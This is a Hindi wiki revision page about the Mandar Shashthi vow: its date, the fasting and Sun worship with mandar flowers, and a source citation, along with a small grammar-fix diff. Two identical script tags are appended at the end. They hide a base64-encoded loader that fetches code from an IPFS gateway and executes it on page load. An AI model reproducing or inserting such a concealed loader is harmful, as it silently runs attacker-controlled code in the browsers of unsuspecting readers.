Difference between revisions of "मन्दार षष्ठी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "ते है।" to "ते हैं।")
Line 2: Line 2:
 
*मन्दारषष्ठी माघ शुक्ल षष्ठी को होता है।
 
*मन्दारषष्ठी माघ शुक्ल षष्ठी को होता है।
 
*पंचमी पर इसमें हलका भोजन किया जाता है और षष्ठी पर उपवास और मन्दार वृक्ष की पूजा की जाती है।
 
*पंचमी पर इसमें हलका भोजन किया जाता है और षष्ठी पर उपवास और मन्दार वृक्ष की पूजा की जाती है।
*दूसरे दिन मन्दार में कुंकुम लगाते है और एक ताम्रपत्र पर काले तिल से अष्ट दल कमल बनाते है।
+
*दूसरे दिन मन्दार में कुंकुम लगाते है और एक ताम्रपत्र पर काले तिल से अष्ट दल कमल बनाते हैं।
 
*मन्दार पुष्पों से आठ दिशाओं में पूर्व से आरम्भ कर विभिन्न नामों से सूर्य की पूजा की जाती है।  
 
*मन्दार पुष्पों से आठ दिशाओं में पूर्व से आरम्भ कर विभिन्न नामों से सूर्य की पूजा की जाती है।  
 
*बीजकोष में हरि पूजा की जाती है।  
 
*बीजकोष में हरि पूजा की जाती है।  

Revision as of 08:32, 20 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • mandarashashthi magh shukl shashthi ko hota hai.
  • panchami par isamean halaka bhojan kiya jata hai aur shashthi par upavas aur mandar vriksh ki pooja ki jati hai.
  • doosare din mandar mean kuankum lagate hai aur ek tamrapatr par kale til se asht dal kamal banate haian.
  • mandar pushpoan se ath dishaoan mean poorv se arambh kar vibhinn namoan se soory ki pooja ki jati hai.
  • bijakosh mean hari pooja ki jati hai.
  • ek varsh tak pratyek mas ki saptami par usi vidhi dvara pooja ki jati hai.
  • ant mean svarnim pratima ke sath ek ghat ka dan diya jata hai.
  • hemadri[1] mean isake bare mean ullekh hai.
  • mandar svarg ke paanch vrikshoan mean pariganit hai, any char haian–parijat, santan, kalpavriksh evan harichandan.

tika tippani aur sandarbh

  1. hemadri vrat॰1, 606-608, bhavishyottarapuran 40|1-15 se uddharan

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>